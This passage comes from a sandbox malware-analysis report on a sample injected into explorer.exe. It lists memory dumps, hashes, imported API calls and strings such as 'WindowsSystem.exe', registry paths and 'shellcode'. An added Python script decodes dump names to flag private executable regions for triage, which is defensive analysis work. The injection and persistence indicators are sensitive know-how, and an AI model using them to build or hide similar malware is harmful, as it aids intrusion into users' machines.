• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: fa60f3a416112e8adcec0e53fd871012574ce522b2df7edb6f362fde096d8998
• Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
• Opcode Fuzzy Hash: fa60f3a416112e8adcec0e53fd871012574ce522b2df7edb6f362fde096d8998
• Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: ad47ab168a522904eb856b3a1201d543518aba2d81f16c490d2d8a331398e2e9
• Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
• Opcode Fuzzy Hash: ad47ab168a522904eb856b3a1201d543518aba2d81f16c490d2d8a331398e2e9
• Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 2bd924773c0a936edeb4f88b958d470719fc266598c3ddbb2f27d594b3bb43b2
• Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
• Opcode Fuzzy Hash: 2bd924773c0a936edeb4f88b958d470719fc266598c3ddbb2f27d594b3bb43b2
• Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: ff5ee50a62be3026aaca02c36c402438e3cb08bf91299c3ab615d8e18b598aed
• Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
• Opcode Fuzzy Hash: ff5ee50a62be3026aaca02c36c402438e3cb08bf91299c3ab615d8e18b598aed
• Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
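Every function above was recovered from the same memory dump, `00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp`, taken from process index 0x10 (the `hcaresult_16_2_e00000_explorer.jbxd` snapshot, i.e. explorer.exe) at base 0x00E00000 with "based on PE: true". The added Python below is not part of the Joe Sandbox report; it decodes such dump names so an analyst can see at a glance which regions are worth carving. The field layout it assumes (process index, stage, dump id, base address, page protection, allocation state, allocation type, reserved) is an inference from the values on this page, not a documented format: the three trailing 32-bit fields match the `Protect`, `State` and `Type` members of `MEMORY_BASIC_INFORMATION`, since the code region at 0xE01000 decodes as `PAGE_EXECUTE_READ`, the header and read-only data at 0xE00000/0xE38000 as `PAGE_READONLY`, the data pages as `PAGE_READWRITE`, and all of them as `MEM_COMMIT | MEM_PRIVATE`. Committed private memory that is executable and holds a PE image is the footprint of a manually mapped payload in a host process, which is what the "Injects code into the Windows Explorer" signature on this report refers to.

```python
"""Decode Joe Sandbox memory-dump source names and flag private executable regions.

Added example, not Joe Sandbox code. The field layout below is ASSUMED from the
values in the report; the protection/state/type constants are the documented
Windows values used by VirtualQuery (MEMORY_BASIC_INFORMATION).
"""
import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: <proc>.<stage>.<dump id>.<base>.<protect>.<state>.<type>.<reserved>.sdmp
_NAME_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<rsv>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def executable(self) -> bool:
        # Any PAGE_EXECUTE* bit (0x10..0x80); guard/nocache modifiers live above 0xFF.
        return bool(self.protect & 0xF0)

    @property
    def private_executable(self) -> bool:
        # Committed, private (not image- or section-backed), executable memory:
        # the shape a manually mapped payload takes inside a host like explorer.exe.
        return self.executable and self.state == 0x1000 and self.mem_type == 0x20000


def parse_dump_name(name: str) -> DumpRegion:
    """Split a .sdmp file name into its region attributes (all fields are hex)."""
    m = _NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised dump name: {name!r}")
    return DumpRegion(
        process_index=int(m["proc"], 16),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        state=int(m["state"], 16),
        mem_type=int(m["type"], 16),
    )


def describe(region: DumpRegion) -> str:
    """One-line human-readable summary, falling back to raw hex for unknown values."""
    return (f"proc#{region.process_index} base=0x{region.base:X} "
            f"{PAGE_PROTECT.get(region.protect, hex(region.protect))} "
            f"{MEM_STATE.get(region.state, hex(region.state))} "
            f"{MEM_TYPE.get(region.mem_type, hex(region.mem_type))}")


def triage(names):
    """Return the dump names whose region is committed, private and executable."""
    return [n for n in names if parse_dump_name(n).private_executable]


# Dump names copied from the report above (process 0x10 = explorer.exe, image at 0xE00000).
REPORT_DUMPS = [
    "00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp",
    "00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp",
    "00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp",
    "00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp",
    "00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for n in REPORT_DUMPS:
        print(describe(parse_dump_name(n)))
    print("private RX regions:", triage(REPORT_DUMPS))
```

Only the 0xE01000 dump comes back from `triage`, which is the one every function entry in this section cites as its "Source File": the executable section of the injected image. The 0xE00000 dump (read-only, the PE header) is what to feed a PE parser to rebuild section boundaries before carving the whole 0xE00000 region for static analysis.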
APIs
• setsockopt.WS2_32 ref: 00E0AB8A
• SetEvent.KERNEL32 ref: 00E0ABFF
  • Part of subcall function 00E17DA0: lstrlenW.KERNEL32 ref: 00E17DEC
• wnsprintfW.SHLWAPI ref: 00E0AC32
• RegDeleteKeyExW.ADVAPI32 ref: 00E0AC50
• wnsprintfW.SHLWAPI ref: 00E0AC83
• RegDeleteKeyExW.ADVAPI32 ref: 00E0ACA1
• wnsprintfW.SHLWAPI ref: 00E0ACD4
• RegDeleteKeyExW.ADVAPI32 ref: 00E0ACF2
• wnsprintfW.SHLWAPI ref: 00E0AD25
• RegDeleteKeyExW.ADVAPI32 ref: 00E0AD43
  • Part of subcall function 00E0F370: RegOpenKeyW.ADVAPI32 ref: 00E0F390
  • Part of subcall function 00E0F370: RegDeleteValueW.ADVAPI32 ref: 00E0F3A6
  • Part of subcall function 00E0F370: RegCloseKey.ADVAPI32 ref: 00E0F3B1
  • Part of subcall function 00E0F370: RegOpenKeyW.ADVAPI32 ref: 00E0F3D3
  • Part of subcall function 00E0F370: RegDeleteValueW.KERNEL32 ref: 00E0F3E9
  • Part of subcall function 00E0F370: RegCloseKey.ADVAPI32 ref: 00E0F3F4
  • Part of subcall function 00E105B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00E04277), ref: 00E105CB
  • Part of subcall function 00E105B0: SHGetKnownFolderPath.SHELL32 ref: 00E105EF
                                                                                                              • Part of subcall function 00E105B0: DeleteFileW.KERNEL32 ref: 00E10625
                                                                                                              • Part of subcall function 00E105B0: CoTaskMemFree.COMBASE ref: 00E10630
                                                                                                              • Part of subcall function 00E105B0: LocalFree.KERNEL32 ref: 00E1063B
                                                                                                              • Part of subcall function 00E105B0: SHGetKnownFolderPath.SHELL32 ref: 00E10652
                                                                                                              • Part of subcall function 00E105B0: LocalAlloc.KERNEL32 ref: 00E1066A
                                                                                                              • Part of subcall function 00E105B0: LocalAlloc.KERNEL32 ref: 00E106B2
                                                                                                              • Part of subcall function 00E105B0: DeleteFileW.KERNEL32 ref: 00E106FD
                                                                                                              • Part of subcall function 00E105B0: RemoveDirectoryW.KERNEL32 ref: 00E10708
                                                                                                              • Part of subcall function 00E105B0: LocalFree.KERNEL32 ref: 00E10713
                                                                                                              • Part of subcall function 00E105B0: LocalFree.KERNEL32 ref: 00E1071E
                                                                                                              • Part of subcall function 00E105B0: CoTaskMemFree.COMBASE ref: 00E10729
                                                                                                              • Part of subcall function 00E0FD90: CoInitializeEx.COMBASE ref: 00E0FDC0
                                                                                                              • Part of subcall function 00E0FD90: CoUninitialize.COMBASE ref: 00E101C3
                                                                                                              • Part of subcall function 00E10330: OpenEventW.KERNEL32 ref: 00E10351
                                                                                                              • Part of subcall function 00E10330: SetEvent.KERNEL32 ref: 00E10372
                                                                                                              • Part of subcall function 00E10330: CloseHandle.KERNEL32 ref: 00E10380
                                                                                                              • Part of subcall function 00E10330: OpenMutexW.KERNEL32 ref: 00E103A0
                                                                                                              • Part of subcall function 00E10330: WaitForSingleObject.KERNEL32 ref: 00E103C6
                                                                                                              • Part of subcall function 00E10330: CloseHandle.KERNEL32 ref: 00E103D4
                                                                                                              • Part of subcall function 00E10330: SHGetKnownFolderPath.SHELL32 ref: 00E103EE
                                                                                                              • Part of subcall function 00E10330: LocalAlloc.KERNEL32 ref: 00E10406
                                                                                                              • Part of subcall function 00E10330: lstrlenW.KERNEL32 ref: 00E10467
                                                                                                              • Part of subcall function 00E10330: GetFileAttributesW.KERNEL32 ref: 00E104F3
                                                                                                              • Part of subcall function 00E10330: LocalFree.KERNEL32 ref: 00E10543
                                                                                                              • Part of subcall function 00E10330: CoTaskMemFree.COMBASE ref: 00E10551
                                                                                                              • Part of subcall function 00E10330: wnsprintfW.SHLWAPI ref: 00E1057E
                                                                                                              • Part of subcall function 00E10330: RegDeleteKeyExW.ADVAPI32 ref: 00E10596
                                                                                                              • Part of subcall function 00E101E0: SHGetKnownFolderPath.SHELL32 ref: 00E101F8
                                                                                                              • Part of subcall function 00E101E0: LocalAlloc.KERNEL32 ref: 00E10210
                                                                                                              • Part of subcall function 00E101E0: lstrlenW.KERNEL32 ref: 00E10262
                                                                                                              • Part of subcall function 00E101E0: GetFileAttributesW.KERNEL32 ref: 00E102CA
                                                                                                              • Part of subcall function 00E101E0: LocalFree.KERNEL32 ref: 00E1030B
                                                                                                              • Part of subcall function 00E101E0: CoTaskMemFree.COMBASE ref: 00E10316
                                                                                                              • Part of subcall function 00E0F790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,00E167C4), ref: 00E0F7AF
                                                                                                              • Part of subcall function 00E0F790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00E167C4), ref: 00E0F7C3
                                                                                                              • Part of subcall function 00E0F790: wnsprintfW.SHLWAPI ref: 00E0F7FC
                                                                                                              • Part of subcall function 00E0F790: lstrlenW.KERNEL32 ref: 00E0F80B
                                                                                                              • Part of subcall function 00E0F790: CoTaskMemFree.COMBASE ref: 00E0F81D
                                                                                                            • GetFileAttributesW.KERNEL32 ref: 00E0AE29
                                                                                                            • SHFileOperationW.SHELL32 ref: 00E0AE48
                                                                                                            • LocalFree.KERNEL32 ref: 00E0AE79
                                                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00E0AF37
                                                                                                            • CreateProcessW.KERNEL32 ref: 00E0B00A
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E0B019
                                                                                                            • DuplicateHandle.KERNEL32 ref: 00E0B06B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E0B07A
                                                                                                            • DuplicateHandle.KERNEL32 ref: 00E0B0CB
                                                                                                            • LoadLibraryW.KERNEL32 ref: 00E0B0E2
                                                                                                            • GetProcAddress.KERNEL32 ref: 00E0B120
                                                                                                            • GetProcAddress.KERNEL32 ref: 00E0B13E
                                                                                                            • lstrcpyW.KERNEL32 ref: 00E0B15C
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B172
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B188
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B19E
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B1B4
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B1CA
                                                                                                            • lstrcpyA.KERNEL32 ref: 00E0B1DD
                                                                                                            • lstrcpyW.KERNEL32 ref: 00E0B1F3
                                                                                                            • lstrcpyW.KERNEL32 ref: 00E0B209
                                                                                                            • LocalFree.KERNEL32 ref: 00E0B2D2
                                                                                                            • CloseHandle.KERNEL32 ref: 00E0B2F7
                                                                                                            • CloseHandle.KERNEL32 ref: 00E0B305
                                                                                                            • TerminateProcess.KERNEL32 ref: 00E0B31F
                                                                                                            • LocalFree.KERNEL32 ref: 00E0B32D
                                                                                                            • OpenEventW.KERNEL32 ref: 00E0B341
                                                                                                            • SetEvent.KERNEL32 ref: 00E0B362
                                                                                                            • CloseHandle.KERNEL32 ref: 00E0B370
                                                                                                            • shutdown.WS2_32 ref: 00E0B383
                                                                                                            • closesocket.WS2_32 ref: 00E0B391
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Deletelstrcpy$CloseHandle$AllocFilewnsprintf$EventFolderKnownOpenPathTask$Processlstrlen$Attributes$AddressCurrentDirectoryDuplicateProcValue$CreateInitializeLibraryLoadMutexObjectOperationRemoveSingleTerminateUninitializeWaitWindowsclosesocketsetsockoptshutdown
                                                                                                            • String ID: %s%s$2$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$WindowsSystem$WindowsSystem.exe$h${108D3252-20F0-4C1B-940D-6ED5366D8FD3}${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${D961EA11-3F69-43D1-8581-E526BBBDC738}${DD700AA6-D197-4A4A-838A-B93EA96F236B}${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
                                                                                                            • API String ID: 1118244034-4064362955
                                                                                                            • Opcode ID: 5d75a97702afd6feea535c42e6fa019a02aea97d84d842329c44f83779ea5af5
                                                                                                            • Instruction ID: fb91bb7698583037ed778a6a957c355f0cc8aa8b1cc083cf6f308e3d66f3868b
                                                                                                            • Opcode Fuzzy Hash: 5d75a97702afd6feea535c42e6fa019a02aea97d84d842329c44f83779ea5af5
                                                                                                            • Instruction Fuzzy Hash: FE42F436218BC095D770DB14F8983DAB3A5F798754F901626D68D93BA8EF7DC288CB40
                                                                                                            APIs
                                                                                                            • GetCommandLineW.KERNEL32 ref: 00E0E8C7
                                                                                                            • CommandLineToArgvW.SHELL32 ref: 00E0E8DC
                                                                                                            • lstrcmpiW.KERNEL32 ref: 00E0E8F7
                                                                                                            • lstrcmpiW.KERNEL32 ref: 00E0E91D
                                                                                                              • Part of subcall function 00E05AD0: GetModuleFileNameW.KERNEL32 ref: 00E05AFE
                                                                                                              • Part of subcall function 00E05AD0: _LDint.LIBCPMTD ref: 00E05B15
                                                                                                              • Part of subcall function 00E05AD0: CreateFileW.KERNEL32 ref: 00E05B93
                                                                                                              • Part of subcall function 00E05AD0: WriteFile.KERNEL32 ref: 00E05BF0
                                                                                                              • Part of subcall function 00E05AD0: CloseHandle.KERNEL32 ref: 00E05C13
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CommandLinelstrcmpi$ArgvCloseCreateDintHandleModuleNameWrite
                                                                                                            • String ID: shellcode${0F01F64A-5A5B-4CC4-B069-D85368F634DD}${34E50511-FBB8-42F8-98A2-2629192A03A0}${6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}${8399C93C-77D8-4A9E-96D7-0200E8B3EE42}${8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}${9D5F29AE-FCE3-40C6-8BE3-47B8C62D31E2}${A3956157-6EDC-4743-A7B9-FF7CDC2529A9}${D77DC119-1B4A-41E3-A066-2927413CA76D}${FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}
                                                                                                            • API String ID: 3070626111-3874382022
                                                                                                            • Opcode ID: 7c865470e0464a453324e7636fbae510bfa24f6739339a5ff32697ba5d3373e2
                                                                                                            • Instruction ID: 314d48a27221324a8134bb630a9b6c45ecb2ebd68f23e116a1486b7a9c09201c
                                                                                                            • Opcode Fuzzy Hash: 7c865470e0464a453324e7636fbae510bfa24f6739339a5ff32697ba5d3373e2
                                                                                                            • Instruction Fuzzy Hash: D7B12031214AC082E754DB25F99835AB3A1F7D87D5F506926E68BA37B4DF7EC888C700
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                                                            • String ID: U
                                                                                                            • API String ID: 3902385426-4171548499
                                                                                                            • Opcode ID: a0fba5ec8bfd1601ee77868f40c78684f16d8da371eac1b93d88cd03410f8666
                                                                                                            • Instruction ID: 5d9714b793314be4d6857517d2f6393132a5fb2a092808b50d725af9a9fd38e9
                                                                                                            • Opcode Fuzzy Hash: a0fba5ec8bfd1601ee77868f40c78684f16d8da371eac1b93d88cd03410f8666
                                                                                                            • Instruction Fuzzy Hash: 24021233304AA586EB208F25F4943AAB771F785B98F552136EA8A67764DF3DC445CB00
                                                                                                            APIs
                                                                                                            • _set_error_mode.LIBCMT ref: 00E2E8D1
                                                                                                            • _set_error_mode.LIBCMT ref: 00E2E8E2
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 00E2E944
                                                                                                              • Part of subcall function 00E2A834: GetCurrentProcess.KERNEL32(?,?,?,?,00E2A8D6), ref: 00E2A84C
                                                                                                            • GetStdHandle.KERNEL32 ref: 00E2EA59
                                                                                                            • WriteFile.KERNEL32 ref: 00E2EAB6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 2183313154-4022980321
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: free$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1012874770-0
APIs
  • Part of subcall function 00E0F510: SHGetKnownFolderPath.SHELL32 ref: 00E0F587
  • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F59A
  • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F5B5
  • Part of subcall function 00E0F510: LocalAlloc.KERNEL32 ref: 00E0F5DC
  • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F620
  • Part of subcall function 00E0F510: CoTaskMemFree.COMBASE ref: 00E0F635
• LocalAlloc.KERNEL32 ref: 00E0F88C
• LocalFree.KERNEL32 ref: 00E0FA3D
  • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
  • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
• LocalAlloc.KERNEL32 ref: 00E0F8D4
• GetModuleFileNameW.KERNEL32 ref: 00E0F8F8
• lstrcmpiW.KERNEL32 ref: 00E0F910
• LocalAlloc.KERNEL32 ref: 00E0F928
• CreateProcessW.KERNEL32 ref: 00E0F9D9
• LocalFree.KERNEL32 ref: 00E0F9E9
• LocalFree.KERNEL32 ref: 00E0F9F4
• LocalFree.KERNEL32 ref: 00E0F9FF
• LocalFree.KERNEL32 ref: 00E0FA0A
• LocalFree.KERNEL32 ref: 00E0FA1C
• LocalFree.KERNEL32 ref: 00E0FA27
• LocalFree.KERNEL32 ref: 00E0FA32
Strings
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: Local$Free$Alloc$lstrlen$CreateFileFolderKnownModuleNamePathProcessTask_errno_invalid_parameter_noinfolstrcmpi
• String ID: "%s%s" %s$%s%s$WindowsSystem.exe$h${A3956157-6EDC-4743-A7B9-FF7CDC2529A9}
• API String ID: 2909854553-3939194678
APIs
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
• String ID:
• API String ID: 3749125693-0
APIs
Strings
Memory Dump Source
